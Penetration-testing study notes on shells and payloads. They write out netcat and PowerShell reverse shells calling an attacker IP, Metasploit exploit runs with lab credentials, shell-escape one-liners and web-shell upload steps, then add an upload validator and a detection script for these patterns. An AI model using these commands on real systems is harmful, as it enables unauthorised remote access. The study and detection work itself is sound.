Introduction

Shells and payloads are the bridge between exploiting a vulnerability and actually interacting with a target system. A shell gives you interactive access to the OS, while a payload is the code or command that delivers that access.

Shells and Payloads at a Glance

A shell is a program that lets you enter commands and receive output, and in security it is often the result of exploitation. In practice you select a payload based on the target OS, available interpreters, and what the network allows.

Payload meanings vary by context, and the list below captures the common uses. This helps avoid confusion between network, programming, and security definitions.

  • Networking: the data portion of a packet
  • Programming: the data executed by code
  • Security: code that triggers a vulnerability or action

Shell Fundamentals

Shell fundamentals explain how you interact with the host once access is gained. Once you see output, you can pivot to enumeration.

# Confirm what you landed in: running processes and the environment of the shell
ps
env

Terminal Emulators and Interpreters

You interact with a shell through a terminal emulator, and the shell itself is a command language interpreter. Common examples include Windows Terminal and GNOME Terminal.

Bind Shells and Reverse Shells

A bind shell opens a listener on the target and waits for you to connect, which means inbound access must be allowed by host and network firewalls. A reverse shell flips the direction, which is usually easier to pass through egress rules.

Bind shell example with netcat:

# 1. Listener on the target
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

# 2. Connect from the attacker
nc -nv 10.129.41.200 7777

Fallback reverse shell if bind fails:

# 1. Listener on the attacker
nc -l 7777

# 2. Target connects back
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.15.38 7777 > /tmp/f

Reverse shell from Windows PowerShell:

# 1. Listener on the attacker
sudo nc -lvnp 443

# 2. Target connects back
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Payload Concepts and Delivery

Payloads are the code or command that executes on the target, so they must match OS, architecture, and available interpreters. Delivery depends on your access path and should balance reliability, stealth, and the ability to maintain an interactive session.

Staged vs Stageless Payloads

Staged payloads deliver a small stager first, which then fetches the rest of the payload over the network; stageless payloads ship everything in one piece. The naming often reveals the type, such as windows/meterpreter/reverse_tcp (staged) versus windows/meterpreter_reverse_tcp (stageless).

Metasploit and MSFvenom

Metasploit is a modular framework that combines exploits and payloads, which speeds up exploitation and post-exploitation. MSFvenom generates standalone payloads you can deliver with email, file uploads, or manual transfer.

The command flow below is a typical Metasploit run against SMB. Treat it as a template and adjust target-specific values.

sudo msfconsole
msf6 > search smb
msf6 > use 56
msf6 exploit(windows/smb/psexec) > options
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71
msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$
msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!
msf6 exploit(windows/smb/psexec) > set SMBUser htb-student
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.222
msf6 exploit(windows/smb/psexec) > exploit
meterpreter > shell

MSFvenom basics are quick to test and easy to adapt to target constraints. Use these commands as a minimal starting point.

msfvenom -l payloads
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
sudo nc -lvnp 443

Windows Shells and Payload Types

Windows targets allow many payload types, so selection depends on delivery vector and execution context. Choose the method that aligns with available privileges and application controls.

The list below highlights common Windows payload types and why they are useful. These options map to native OS tooling.

  • DLL: for injection or DLL hijacking
  • Batch files: simple scripted commands
  • MSI: installable payloads via msiexec
  • PowerShell: flexible and powerful scripting

Windows Exploit Walkthrough

A simple workflow is to enumerate the host, confirm a known vulnerability, and then exploit with a suitable module. Always verify access level with getuid and drop into a system shell for normal command use.

nmap -v -A 10.129.201.97
sudo msfconsole
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.129.201.97
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
msf6 > search eternal
msf6 > use 2
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.129.201.97
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.12
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 4444
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
meterpreter > getuid
meterpreter > shell

CMD vs PowerShell Usage

Use CMD when you need minimal interaction on older hosts or simple batch commands. PowerShell is better for object-based output and custom scripting.

CMD is useful when you need low-friction access with minimal dependencies. The list below highlights common cases.

  • PowerShell is missing or restricted
  • You only need simple commands
  • You rely on basic batch scripts

PowerShell is useful when you need richer scripting and object handling. The list below highlights common cases.

  • You need cmdlets or .NET objects
  • You are automating complex tasks
  • You are working with cloud services

NIX Shells and TTY Upgrades

Linux and Unix targets often provide multiple interpreters, so you should identify what is available before selecting a payload. If the shell is limited, upgrading it to a fully interactive TTY improves stability and usability.

The workflow below is a typical Linux exploitation path using a web app RCE. Use it as a reference and swap in the right target values.

nmap -sC -sV 10.129.201.101
sudo msfconsole
msf6 > search rconfig
msf6 > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOSTS 10.129.201.101
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set LHOST 10.10.14.111
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set LPORT 4444
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/sh")'

Interactive Shell Generation

If you land a limited shell, spawning an interactive interpreter is usually the next step. These commands often need a scriptable execution context.

/bin/sh -i
# Perl
perl -e 'exec "/bin/sh";'
# Ruby (run inside a Ruby context such as irb or ruby -e)
exec "/bin/sh"
# Lua (run inside a Lua context)
os.execute('/bin/sh')
# awk, find and vim can all hand off to a shell
awk 'BEGIN {system("/bin/sh")}'
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'

Web Shells in Practice

Web shells are browser-based command interfaces deployed through file upload or code injection flaws. They often provide the first foothold on a web server but come with limited interactivity and higher detection risk.

Common pitfalls show up quickly during enumeration, especially in unstable web apps. The list below summarizes the most frequent issues.

  • Uploads removed by cleanup jobs
  • Limited command chaining and file transfer
  • Higher forensic footprint on the web server

Laudanum

Laudanum is a collection of ready-to-use web shells for multiple languages, which makes it a fast option during web exploitation. You usually copy a shell file, edit it to allow your IP, and upload it through the vulnerable application.

cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
nano /home/tester/demo.aspx
# Update allowedIps with your IP, then upload demo.aspx
# Example access path: http://victima.com/files/demo.aspx

Antak

Antak is an ASPX web shell from the Nishang project and is useful for Windows targets because it leverages PowerShell. The workflow is similar to Laudanum, but you also set a username and password inside the file before uploading.

cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx
nano /home/administrator/Upload.aspx
# Update Username/Password in the file, then upload
# Example access path: http://status.inlanefreight.local/files/Upload.aspx

PHP Web Shell with Burp Suite

Some applications restrict upload content types, so you may need to intercept and modify the request. Burp Suite can change Content-Type to bypass basic checks, letting you upload a PHP web shell disguised as an image.

# Intercept the upload request in Burp and change:
# Content-Type: application/x-php -> Content-Type: image/gif
# Then forward and access the uploaded PHP file via its web path
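The Content-Type trick above only works when the server keys its decision on that header. The validator below is an added example (not from the original notes or any project): it ignores the client's Content-Type and checks the extension allowlist and the file's magic bytes instead, so a PHP file relabelled as image/gif is still rejected. The function name, the allowlist and the sample inputs are constructed.

```python
"""Server-side upload check that never trusts the client's Content-Type.
Added example; validate_upload, ALLOWED_EXT and MAGIC are constructed."""
import os

ALLOWED_EXT = {".gif", ".png", ".jpg", ".jpeg"}
# Bytes a genuine file of each allowed type must start with.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

def validate_upload(filename: str, data: bytes, content_type: str) -> tuple[bool, str]:
    """Return (accepted, reason). content_type is only echoed in the reason, never trusted."""
    base = os.path.basename(filename)          # drop any path components
    ext = os.path.splitext(base)[1].lower()    # last extension decides the handler
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed (client claimed {content_type})"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, f"content does not match {ext} magic bytes"
    # Reject polyglots: an image header followed by PHP tags still runs if the
    # server is misconfigured to pass .gif files through the PHP handler.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag detected"
    return True, "ok"

def _demo():
    # Constructed requests mirroring the Burp scenario: same bytes, relabelled.
    sample = b"<?php /* constructed test file */ ?>"
    print(validate_upload("shell.php", sample, "image/gif"))                   # rejected: extension
    print(validate_upload("shell.gif", sample, "image/gif"))                   # rejected: magic bytes
    print(validate_upload("pic.gif", b"GIF89a" + b"\x00" * 16, "image/gif"))   # accepted
    print(validate_upload("poly.gif", b"GIF89a<?php echo 1; ?>", "image/gif")) # rejected: polyglot

if __name__ == "__main__":
    _demo()
```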

Detection, Visibility, and Mitigation

Defenders map shells and payloads to the MITRE ATT&CK framework, primarily in Initial Access, Execution, and Command and Control. Visibility is critical because shells often look like normal traffic unless you baseline behavior.

Common events to monitor help detect both successful and attempted execution. The list below focuses on the highest signal items.

  • File uploads to web applications
  • Non-admin users running shell commands
  • Unusual network sessions or beaconing on ports like 4444
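A detection pass over process-creation events for the shell patterns shown earlier on this page (the mkfifo-plus-nc pipelines, the PowerShell TCPClient one-liner, the pty.spawn upgrade, and an interpreter spawned by a web server worker). This is an added example, not part of the original notes or any tool: the key=value log format, the rule names and the sample events are all constructed.

```python
"""Flag process events that match the shell patterns in these notes.
Added example; the event format, RULES and SAMPLE_EVENTS are constructed."""
import re
import shlex

# Parent process names that should never be spawning a command interpreter.
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "w3wp.exe"}

# Each rule is a predicate over one parsed event dict.
RULES = {
    # named pipe wired into nc: the bind/reverse shell shape used above
    "mkfifo_nc_shell": lambda e: re.search(r"\bmkfifo\b.*\|\s*(nc|ncat|netcat)\b", e["cmd"]) is not None,
    # PowerShell opening a TCP client and evaluating whatever it receives
    "powershell_tcp_iex": lambda e: "TCPClient(" in e["cmd"]
        and re.search(r"\b(iex|Invoke-Expression)\b", e["cmd"], re.I) is not None,
    # a limited shell being upgraded to a full TTY
    "pty_upgrade": lambda e: "pty.spawn(" in e["cmd"],
    # sh/bash/cmd/powershell whose parent is a web server worker: web shell indicator
    "webserver_spawned_shell": lambda e: e["parent"] in WEB_PARENTS
        and re.match(r"^(/bin/|/usr/bin/)?(ba)?sh\b|^cmd(\.exe)?\b|^powershell", e["cmd"]) is not None,
}

def parse_event(line: str) -> dict:
    """Parse 'key=value key="quoted value"' into a dict (constructed format)."""
    return dict(tok.split("=", 1) for tok in shlex.split(line))

def detect(lines):
    """Return [(line_no, user, rule_name)] for every rule each event trips."""
    hits = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        for name, pred in RULES.items():
            if pred(ev):
                hits.append((n, ev["user"], name))
    return hits

SAMPLE_EVENTS = [  # constructed, not real telemetry
    'ts=2024-05-01T10:00:01Z user=www-data parent=apache2 cmd="/bin/sh -c id"',
    'ts=2024-05-01T10:00:05Z user=www-data parent=sh cmd="rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.15.38 7777 > /tmp/f"',
    'ts=2024-05-01T10:00:09Z user=www-data parent=bash cmd="python -c \'import pty; pty.spawn(\\"/bin/sh\\")\'"',
    'ts=2024-05-01T10:01:00Z user=alice parent=explorer.exe cmd="powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443); iex $data"',
    'ts=2024-05-01T10:02:00Z user=bob parent=sshd cmd="/bin/bash -l"',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The last sample event (an interactive bash under sshd) is the benign control and produces no hit.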

Visibility best practices reduce blind spots across hosts and network paths. The list below highlights practical starting points.

  • NetFlow and firewall log analysis
  • Centralized SIEM alerts for shell activity

Mitigations to reduce shell success focus on limiting execution paths and lateral movement. The list below summarizes the most effective controls.

  • Application sandboxing for exposed services
  • Least privilege and strong permission boundaries
  • Host segmentation and hardened DMZ placement

Reference

This article is based on my personal study notes from the Information Security Foundations track.

Full repository: https://github.com/lameiro0x/pentesting-path-htb